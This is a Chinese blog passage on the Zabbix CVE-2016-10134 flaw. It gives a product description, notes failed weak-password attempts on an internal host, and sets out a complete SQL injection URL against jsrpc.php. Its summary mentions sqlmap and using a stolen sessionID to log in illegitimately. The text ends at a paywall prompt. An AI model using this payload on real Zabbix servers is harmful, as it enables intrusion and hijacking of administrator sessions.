本文介绍了Zabbix的CVE-2016-10134漏洞,该漏洞允许通过特定URL参数进行攻击。在内网环境中,通过尝试弱密码无效后,作者展示了如何通过添加URL内容来检测漏洞的存在。一旦确认漏洞,可以使用sqlmap工具和提供的检测利用工具获取sessionID。解密cmd5后的账号密码或利用sessionID可实现非法登录,但sessionID的有效性依赖于管理员未退出登录界面。
首先,百度百科抄一下定义
zabbix是一个基于web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案
zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
zabbix由2部分构成,zabbix server与可选组件zabbix agent。
zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。
总结来说,就是挺重要的。
我是在内网进行测试的,地址为10.0.xx.220:8000
好了,弱密码使了很多,并没有什么用,开始测试
在url后面添加如下内容
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=tr
最低0.47元/天 解锁文章
扫一扫
3827
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
